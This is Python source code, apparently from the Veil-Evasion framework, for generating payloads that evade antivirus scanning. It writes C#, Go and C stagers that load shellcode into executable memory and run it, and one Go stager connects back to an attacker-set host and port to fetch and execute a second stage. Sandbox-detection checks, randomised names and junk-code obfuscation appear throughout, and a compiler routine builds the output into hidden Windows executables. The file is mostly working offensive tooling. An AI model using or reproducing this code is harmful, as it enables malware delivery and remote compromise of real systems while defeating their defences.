r[10], r[11], r[12], r[13], r[14], r[15])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
payload_code += "static void Main() {\n"
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 2
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % (
bytearrayName, Shellcode)
payload_code += '\t' * num_tabs_required + "IntPtr %s = VirtualAlloc(0, (UInt32)%s.Length, 0x3000, 0x04);\n" % (
funcAddrName, bytearrayName)
payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
bytearrayName, funcAddrName, bytearrayName)
payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (
hThreadName, threadIdName, pinfoName)
payload_code += '\t' * num_tabs_required + "uint %s;\n" % (
random_out)
payload_code += '\t' * num_tabs_required + "bool %s = VirtualProtect(%s, (uint)0x1000, (uint)0x20, out %s);\n" % (
rand_bool, funcAddrName, random_out)
payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (
hThreadName)
# payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
rand_heap = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_var = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % (
bytearrayName, Shellcode)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
rand_ptr, rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
rand_ptr, bytearrayName, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(
rand_var)
payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, rand_ptr, rand_var)
payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(
hThreadName)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomly generate out variable names
memCommit = evasion_helpers.randomString()
memReserve = evasion_helpers.randomString()
pageExecRW = evasion_helpers.randomString()
kernel32 = evasion_helpers.randomString()
procVirtualAlloc = evasion_helpers.randomString()
cust_func = evasion_helpers.randomString()
size = evasion_helpers.randomString()
addr = evasion_helpers.randomString()
err = evasion_helpers.randomString()
shellcode_variable = evasion_helpers.randomString()
buff = evasion_helpers.randomString()
value = evasion_helpers.randomString()
heapcreatevariable = evasion_helpers.randomString()
heapallocvariable = evasion_helpers.randomString()
heapcreateout = evasion_helpers.randomString()
errorvariable = evasion_helpers.randomString()
heapallocout = evasion_helpers.randomString()
rand_var = evasion_helpers.randomString()
procVirtualProtect = evasion_helpers.randomString()
proc_out = evasion_helpers.randomString()
vprotectendvar = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# sandbox check code
sandbox_checks, num_curlys = gamemaker.senecas_games(self)
payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n\"fmt\"\n\"os\"\n"
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += "\"runtime\"\n"
# Add in other imports based on checks being performed
if self.required_options["USERNAME"][0].lower() != "x":
payload_code += "\"strings\"\n\"os/user\"\n"
if self.required_options["HOSTNAME"][0].lower() != "x" or self.required_options["PROCCHECK"][0].lower() != 'false':
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
if self.required_options["SLEEP"][0].lower() != "x":
payload_code += "\"net\"\n\"time\"\n\"encoding/binary\"\n"
if self.required_options["BADMACS"][0].lower() != 'false':
if "net" not in payload_code:
payload_code += "\"net\"\n"
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
if self.required_options["UTCCHECK"][0].lower() != 'false':
if "time" not in payload_code:
payload_code += "\"time\"\n"
if self.required_options["CURSORCHECK"][0].lower() != 'false':
if "time" not in payload_code:
payload_code += "\"time\"\n"
payload_code += ")\n"
# Changes based on injection type
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "const (\n"
payload_code += "%s = 0x1000\n" % (memCommit)
payload_code += "%s = 0x2000\n" % (memReserve)
payload_code += "%s = 0x04\n)\n" % (pageExecRW)
payload_code += "var (\n"
# injection type
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "%s = 0\n" %(proc_out)
payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32)
payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32)
payload_code += "%s = %s.NewProc(\"VirtualProtect\")\n)\n" %(procVirtualProtect, kernel32)
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" %(cust_func, size)
payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n"
payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" %(cust_func, size)
payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
payload_code += heapallocout + ", _, _ := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(heapallocout, errorvariable, heapallocout)
payload_code += "var %s string = \"%s\"\n" %(shellcode_variable, Shellcode)
payload_code += "func main() {\n"
# Sandbox code goes here
if sandbox_checks != '':
payload_code += sandbox_checks
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "%s, %s := %s(uintptr(len(%s)))\n" %(addr, err, cust_func, shellcode_variable)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "%s, %s := %s(uintptr(len(%s)))\n" %(heapallocout, err, cust_func, shellcode_variable)
payload_code += "if %s != nil {\nfmt.Println(%s)\nos.Exit(1)\n}\n" %(err, err)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(buff, addr)
payload_code += "var %s uintptr\n" %(proc_out)
payload_code += "var %s uintptr\n" %(vprotectendvar)
payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" %(value, shellcode_variable)
payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)
payload_code += "%s, _, %s = %s.Call(%s, uintptr(len(%s)), 0x20, uintptr(unsafe.Pointer(&%s)))\n" %(proc_out, err, procVirtualProtect, addr, shellcode_variable, vprotectendvar)
payload_code += "if %s == 0 {\nos.Exit(1)\n}\n" %(proc_out)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(buff, heapallocout)
payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" %(value, shellcode_variable)
payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (addr)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (heapallocout)
payload_code += '}' * num_curlys
self.payload_source_code = payload_code
return
def generate(self):
memCommit = evasion_helpers.randomString()
memReserve = evasion_helpers.randomString()
pageExecRW = evasion_helpers.randomString()
kernel32 = evasion_helpers.randomString()
procVirtualAlloc = evasion_helpers.randomString()
size = evasion_helpers.randomString()
err = evasion_helpers.randomString()
wsadata = evasion_helpers.randomString()
socket = evasion_helpers.randomString()
socketAddr = evasion_helpers.randomString()
ip = self.required_options["LHOST"][0].split('.')
buf = evasion_helpers.randomString()
dataBuf = evasion_helpers.randomString()
flags = evasion_helpers.randomString()
qty = evasion_helpers.randomString()
scLength = evasion_helpers.randomString()
sc = evasion_helpers.randomString()
sc2 = evasion_helpers.randomString()
total = evasion_helpers.randomString()
mem = evasion_helpers.randomString()
buffer_variable = evasion_helpers.randomString()
handle = evasion_helpers.randomString()
x = evasion_helpers.randomString()
value = evasion_helpers.randomString()
cust_func = evasion_helpers.randomString()
heapcreatevariable = evasion_helpers.randomString()
heapallocvariable = evasion_helpers.randomString()
heapcreateout = evasion_helpers.randomString()
allocvarout = evasion_helpers.randomString()
errorvariable = evasion_helpers.randomString()
errorvariabledos = evasion_helpers.randomString()
constSize = evasion_helpers.randomString()
# sandbox check code
sandbox_checks, num_curlys = gamemaker.senecas_games(self)
payload_code = "package main\nimport (\n\"encoding/binary\"\n\"syscall\"\n\"unsafe\"\n"
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += "\"runtime\"\n"
# Add in other imports based on checks being performed
if self.required_options["USERNAME"][0].lower() != "x":
payload_code += "\"strings\"\n\"os/user\"\n"
if self.required_options["MINPROCS"][0].lower() != "x":
payload_code += "\"os\"\n"
if self.required_options["HOSTNAME"][0].lower(
) != "x" or self.required_options["PROCCHECK"][0].lower() != 'false':
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
if self.required_options["SLEEP"][0].lower() != "x":
payload_code += "\"net\"\n\"time\"\n\"encoding/binary\"\n"
if self.required_options["BADMACS"][0].lower() != 'false':
if "net" not in payload_code:
payload_code += "\"net\"\n"
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
if self.required_options["UTCCHECK"][0].lower() != 'false':
if "time" not in payload_code:
payload_code += "\"time\"\n"
if self.required_options["CURSORCHECK"][0].lower() != 'false':
if "time" not in payload_code:
payload_code += "\"time\"\n"
payload_code += ")\n"
payload_code += "const (\n"
payload_code += "%s = 0x1000\n" % (memCommit)
payload_code += "%s = 0x2000\n" % (memReserve)
payload_code += "%s = 0x40\n)\n" % (pageExecRW)
payload_code += "var (\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % (
kernel32)
payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % (
procVirtualAlloc, kernel32)
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (
cust_func, size)
payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % (
allocvarout, err, procVirtualAlloc, size, memReserve,
memCommit, pageExecRW)
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (
allocvarout, err, allocvarout)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n"
payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (
cust_func, size)
payload_code += heapcreateout + ", _, " + errorvariabledos + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (
allocvarout, errorvariabledos, allocvarout)
payload_code += "func main() {\n"
# Sandbox code goes here
if sandbox_checks != '':
payload_code += sandbox_checks
payload_code += "const %s = 1000 << 10\n" % (constSize)
payload_code += "var %s syscall.WSAData\n" % (wsadata)
payload_code += "syscall.WSAStartup(uint32(0x202), &%s)\n" % (wsadata)
payload_code += "%s, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n" % (
socket)
payload_code += "%s := syscall.SockaddrInet4{Port: %s, Addr: [4]byte{%s, %s, %s, %s}}\n" % (
socketAddr, self.required_options["LPORT"][0], ip[0], ip[1], ip[2],
ip[3])
payload_code += "syscall.Connect(%s, &%s)\n" % (socket, socketAddr)
payload_code += "var %s [4]byte\n" % (buf)
payload_code += "%s := syscall.WSABuf{Len: uint32(4), Buf: &%s[0]}\n" % (
dataBuf, buf)
payload_code += "%s := uint32(0)\n" % (flags)
payload_code += "%s := uint32(0)\n" % (qty)
payload_code += "syscall.WSARecv(%s, &%s, 1, &%s, &%s, nil, nil)\n" % (
socket, dataBuf, qty, flags)
payload_code += "%s := binary.LittleEndian.Uint32(%s[:])\n" % (
scLength, buf)
payload_code += "%s := make([]byte, %s)\n" % (sc, scLength)
payload_code += "var %s []byte\n" % (sc2)
payload_code += "%s = syscall.WSABuf{Len: %s, Buf: &%s[0]}\n" % (
dataBuf, scLength, sc)
payload_code += "%s = uint32(0)\n" % (flags)
payload_code += "%s = uint32(0)\n" % (qty)
payload_code += "%s := uint32(0)\n" % (total)
payload_code += "for %s < %s {\n" % (total, scLength)
payload_code += "syscall.WSARecv(%s, &%s, 1, &%s, &%s, nil, nil)\n" % (
socket, dataBuf, qty, flags)
payload_code += "for i := 0; i < int(%s); i++ {\n" % (qty)
payload_code += "%s = append(%s, %s[i])\n}\n%s += %s\n}\n" % (
sc2, sc2, sc, total, qty)
payload_code += "%s, _ := %s(uintptr(%s + 5))\n" % (mem, cust_func,
scLength)
payload_code += "%s := (*[%s]byte)(unsafe.Pointer(%s))\n" % (
buffer_variable, constSize, mem)
payload_code += "%s := (uintptr)(unsafe.Pointer(%s))\n" % (handle,
socket)
payload_code += "%s[0] = 0xBF\n" % (buffer_variable)
payload_code += "%s[1] = byte(%s)\n" % (buffer_variable, handle)
payload_code += "%s[2] = 0x00\n" % (buffer_variable)
payload_code += "%s[3] = 0x00\n" % (buffer_variable)
payload_code += "%s[4] = 0x00\n" % (buffer_variable)
payload_code += "for %s, %s := range %s {\n" % (x, value, sc2)
payload_code += "%s[%s+5] = %s\n}\n" % (buffer_variable, x, value)
payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (mem)
payload_code += '}' * num_curlys
self.payload_source_code = payload_code
return
def compiler(payload_object, invoked=False, cli_object=None):
# Check the source code to ensure it is present
if payload_object.payload_source_code == '':
print(
helpers.color("\n [!] ERROR: No payload source code provided.\n",
warning=True))
return False
else:
# print title bar
evasion_helpers.title_screen()
if not invoked:
# Determine the file name to use for output
file_name = input(
' [>] Please enter the base name for output files (default is payload): '
).strip()
else:
file_name = cli_object.o
# Basic checks on input
while file_name != '' and ("\\" in file_name or "/" in file_name):
print(
helpers.color(
"\nPlease provide a base name, not a path, for the output base\n",
warning=True))
file_name = input(
' [>] Please enter the base name for output files (default is payload): '
).strip()
# If no base name, set it to be payload
if file_name == '':
file_name = 'payload'
# run check to make sure file doesn't exist, if it does
# provide a new filename
file_name = find_file_name(file_name, payload_object)
source_code_filepath = settings.PAYLOAD_SOURCE_PATH + file_name + "." + payload_object.extension
# Used when outputting exe files, go figure
executable_filepath = settings.PAYLOAD_COMPILED_PATH + file_name + ".exe"
if payload_object.language is not "native" and payload_object.extension is not "war":
with open(source_code_filepath, 'w') as source_file:
source_file.write(payload_object.payload_source_code)
if payload_object.language == 'python':
if not invoked:
compile_method = ""
else:
compile_method = cli_object.compiler
# Check extension for war or normal python file
if payload_object.extension == 'py':
if settings.OPERATING_SYSTEM == "Windows":
compile_method = 'py2exe'
else:
if payload_object.required_options['COMPILE_TO_EXE'][
0].lower() == 'y' and not invoked:
print()
evasion_helpers.title_screen()
print()
# if we have a linux distro, continue...
# Determine if the user wants Pyinstaller, Pwnstaller, or Py2Exe.
print(
' [?] How would you like to create your payload executable?\n'
)
print(' %s - Pyinstaller %s' %
(helpers.color('1'),
helpers.color('(default)', yellow=True)))
print(' %s - Py2Exe\n' % (helpers.color('2')))
user_compile_choice = input(
" [>] Please enter the number of your choice: ")
if user_compile_choice == "1" or user_compile_choice == '':
compile_method = "pyinstaller"
elif user_compile_choice == "2":
compile_method = "py2exe"
else:
compile_method = "pyinstaller"
if compile_method == 'py2exe' and payload_object.required_options[
'COMPILE_TO_EXE'][0].lower() == 'y':
# Generate setup.py File for Py2Exe
with open(settings.PAYLOAD_SOURCE_PATH + '/setup.py',
'w') as setup_file:
setup_file.write("from distutils.core import setup\n")
setup_file.write("import py2exe, sys, os\n\n")
setup_file.write("setup(\n")
setup_file.write(
"\toptions = {'py2exe': {'bundle_files': 1}},\n")
setup_file.write("\tzipfile = None,\n")
setup_file.write("\twindows=['" + file_name +
".py']\n")
setup_file.write(")")
# Generate Batch script for Compiling on Windows Using Py2Exe
with open(settings.PAYLOAD_SOURCE_PATH + '/runme.bat',
'w') as runme_file:
runme_file.write(
'rem Batch Script for compiling python code into an executable\n'
)
runme_file.write('rem on windows with py2exe\n')
runme_file.write(
'rem Usage: Drop into your Python folder and click, or anywhere if Python is in your system path\n\n'
)
runme_file.write("python setup.py py2exe\n")
runme_file.write('cd dist\n')
runme_file.write('move ' + file_name + '.exe ../\n')
runme_file.write('cd ..\n')
runme_file.write('rmdir /S /Q build\n')
runme_file.write('rmdir /S /Q dist\n')
print()
evasion_helpers.title_screen()
print()
print_payload_information(payload_object)
print(
helpers.color(
"\npy2exe files 'setup.py' and 'runme.bat' written to:\n"
+ settings.PAYLOAD_SOURCE_PATH + "\n"))
else:
if payload_object.required_options['COMPILE_TO_EXE'][
0].lower() == 'y':
# Used for PyInstaller standard
# copy the pyinstaller runw to maintain its integrity in the event
# pwnstaller is added in for python3 - this will future proof it
runw_path = settings.VEIL_PATH + '/tools/evasion/evasion_common/tools/runw.orig.exe'
os.system(
"cp " + runw_path + " " +
settings.PYINSTALLER_PATH +
"/PyInstaller/bootloader/Windows-32bit/runw.exe")
# Validate python is installed in wine
if not os.path.isfile(settings.WINEPREFIX +
'drive_c/Python34/python.exe'):
print(
helpers.color(
"\n [!] ERROR: Can't find python.exe in " +
os.path.expanduser(settings.WINEPREFIX +
'drive_c/Python34/'),
warning=True))
print(
helpers.color(
" [!] ERROR: Make sure the python.exe binary exists before using PyInstaller.",
warning=True))
sys.exit(1)
random_key = evasion_helpers.randomString()
os.system(
'WINEPREFIX=' + settings.WINEPREFIX + ' wine ' +
settings.WINEPREFIX +
'/drive_c/Python34/python.exe' + ' ' +
os.path.expanduser(settings.PYINSTALLER_PATH +
'/pyinstaller.py') +
' --onefile --noconsole --key ' + random_key +
' ' + source_code_filepath)
print()
evasion_helpers.title_screen()
print()
if os.path.isfile('dist/' + file_name + ".exe"):
os.system('mv dist/' + file_name + ".exe " +
settings.PAYLOAD_COMPILED_PATH)
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(
" [*] Executable written to: " +
helpers.color(settings.PAYLOAD_COMPILED_PATH +
file_name + ".exe"))
else:
print(
helpers.color(
" [!] ERROR: Unable to create output file.",
warning=True))
os.system('rm -rf dist')
os.system('rm -rf build')
os.system('rm -f *.spec')
os.system('rm -f logdict*.*')
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.extension == 'war':
path_here = settings.PAYLOAD_COMPILED_PATH + file_name + "." + payload_object.extension
with open(path_here, 'wb') as source_file:
source_file.write(payload_object.payload_source_code)
# Ensure that war file was written to disk
if os.path.isfile(path_here):
hash_executable(path_here, file_name)
print_payload_information(payload_object)
print(" [*] WAR file written to: " +
helpers.color(source_code_filepath))
else:
print(
helpers.color(" [!] ERROR: Unable to create WAR file.",
warning=True))
else:
print(
helpers.color(
" [!] ERROR: Invalid python extension in payload module.\n",
warning=True))
elif payload_object.language == 'ruby':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower(
) == 'y':
os.system(
'WINEPREFIX=' + settings.WINEPREFIX + ' wine ' +
settings.WINEPREFIX + '/drive_c/Ruby187/bin/ruby.exe ' +
settings.WINEPREFIX +
'/drive_c/Ruby187/bin/ocra --windows ' +
source_code_filepath + ' --output ' + executable_filepath +
' ' + settings.WINEPREFIX +
'/drive_c/Ruby187/lib/ruby/gems/1.8/gems/win32-api-1.4.8-x86-mingw32/lib/win32/*'
)
print()
evasion_helpers.title_screen()
print()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " +
helpers.color(executable_filepath))
else:
print(
helpers.color(
" [!] ERROR: Unable to create output file.",
warning=True))
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'powershell':
print()
evasion_helpers.title_screen()
print()
print_payload_information(payload_object)
print(" [*] PowerShell doesn't compile, so you just get text :)")
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'perl':
print_payload_information(payload_object)
print(
"\nPerl can't currently be compiled in Linux. Install on Windows:"
)
print(
"https://www.veil-framework.com/perl-of-no-hope-january-v-day-2016/"
)
print("Command: pp -gui -o <executablename> <sourcecodefile.pl>")
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'native':
# set path for native payload executable output
path_here = settings.PAYLOAD_COMPILED_PATH + file_name + "." + payload_object.extension
with open(path_here, 'wb') as source_file:
source_file.write(payload_object.payload_source_code)
# Ensure executables was written to disk
if os.path.isfile(path_here):
hash_executable(path_here, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " +
helpers.color(path_here))
else:
print(
helpers.color(" [!] ERROR: Unable to create Exe file.",
warning=True))
elif payload_object.language == 'lua':
print_payload_information(payload_object)
print(
" [*] Lua currently doesn't compile in linux, so you just get text :)"
)
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'go':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower(
) == 'y':
# Compile go payload
os.system(
'env GOROOT={0} GOOS=windows GOARCH=386 {0}/bin/go build -ldflags "-s -w -H=windowsgui" -v -o {1} {2}'
.format(settings.GOLANG_PATH, executable_filepath,
source_code_filepath))
print()
evasion_helpers.title_screen()
print()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " +
helpers.color(executable_filepath))
else:
print(
helpers.color(
" [!] ERROR: Unable to create output file.",
warning=True))
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'cs':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower(
) == 'y':
# Compile our CS code into an executable and pass a compiler flag to prevent it from opening a command prompt when run
os.system('mcs -platform:x86 -target:winexe ' +
source_code_filepath + ' -out:' +
executable_filepath)
print()
evasion_helpers.title_screen()
print()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " +
helpers.color(executable_filepath))
else:
print(
helpers.color(
" [!] ERROR: Unable to create output file.",
warning=True))
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'c':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower(
) == 'y':
# Compile our C code into an executable and pass a compiler flag to prevent it from opening a command prompt when run
os.system('i686-w64-mingw32-gcc -Wl,-subsystem,windows ' +
source_code_filepath + ' -o ' + executable_filepath +
" -lwsock32")
print()
evasion_helpers.title_screen()
print()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " +
helpers.color(executable_filepath))
else:
print(
helpers.color(
" [!] ERROR: Unable to create output file.",
warning=True))
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
elif payload_object.language == 'autoit':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower(
) == 'y':
# Compile autoit code
os.system(
'WINEPREFIX=' + settings.WINEPREFIX + ' wine ' +
settings.WINEPREFIX +
'drive_c/Program\ Files/AutoIt3/Aut2Exe/Aut2exe.exe /in ' +
source_code_filepath + ' /out ' + executable_filepath +
' /comp 2 /nopack')
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " +
helpers.color(executable_filepath))
else:
print(
helpers.color(
" [!] ERROR: Unable to create output file.",
warning=True))
print(" [*] Source code written to: " +
helpers.color(source_code_filepath))
else:
print(
helpers.color(
"\n [!] ERROR: Invalid payload language in payload module.\n",
warning=True))
return False
if invoked:
handler_code_generator(payload_object,
file_name,
invoked=True,
cli_obj=cli_object)
else:
handler_code_generator(payload_object, file_name)
if os.path.isfile(settings.HANDLER_PATH + file_name + '.rc'):
print(" [*] Metasploit Resource file written to: " +
helpers.color(settings.HANDLER_PATH + file_name + '.rc'))
if not invoked:
dummy = input('\nHit enter to continue...\n')
# End of if statement checking to make sure payload_source_code is
# not empty
return True
def generate(self):
sumvalue_name = evasion_helpers.randomString()
checksum_name = evasion_helpers.randomString()
winsock_init_name = evasion_helpers.randomString()
punt_name = evasion_helpers.randomString()
wsconnect_name = evasion_helpers.randomString()
# the real includes needed
includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>", "#include <time.h>"]
# max length string for obfuscation
global_max_string_length = 10000
max_string_length = random.randint(100,global_max_string_length)
max_num_strings = 10000
# TODO: add in more string processing functions
randName1 = evasion_helpers.randomString() # reverse()
randName2 = evasion_helpers.randomString() # doubles characters
stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
(randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
]
random.shuffle(stringModFunctions)
# obfuscation "logical nop" string generation functions
randString1 = evasion_helpers.randomString(50)
randName1 = evasion_helpers.randomString()
randVar1 = evasion_helpers.randomString()
randName2 = evasion_helpers.randomString()
randVar2 = evasion_helpers.randomString()
randVar3 = evasion_helpers.randomString()
randName3 = evasion_helpers.randomString()
randVar4 = evasion_helpers.randomString()
randVar5 = evasion_helpers.randomString()
stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[25])),
(randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, evasion_helpers.randomString(50), randVar3, evasion_helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
(randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, evasion_helpers.randomString(50), randVar5, randVar4, randVar5))
]
random.shuffle(stringGenFunctions)
# obfuscation - add in our fake includes
fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
"#include <limits.h>", "#include <assert.h>"]
for x in range(1, random.randint(1,7)):
includes.append(fake_includes[x])
# shuffle up real/fake includes
random.shuffle(includes)
code = "#define _WIN32_WINNT 0x0500\n"
code += "#include <winsock2.h>\n"
code += "\n".join(includes) + "\n"
#string mod functions
code += stringModFunctions[0][1] + "\n"
code += stringModFunctions[1][1] + "\n"
# build the sumValue function
string_arg_name = evasion_helpers.randomString()
retval_name = evasion_helpers.randomString()
code += "int %s(char %s[]) {" % (sumvalue_name, string_arg_name)
code += "int %s=0; int i;" %(retval_name)
code += "for (i=0; i<strlen(%s);++i) %s += %s[i];" %(string_arg_name, retval_name, string_arg_name)
code += "return (%s %% 256);}\n" %(retval_name)
# build the winsock_init function
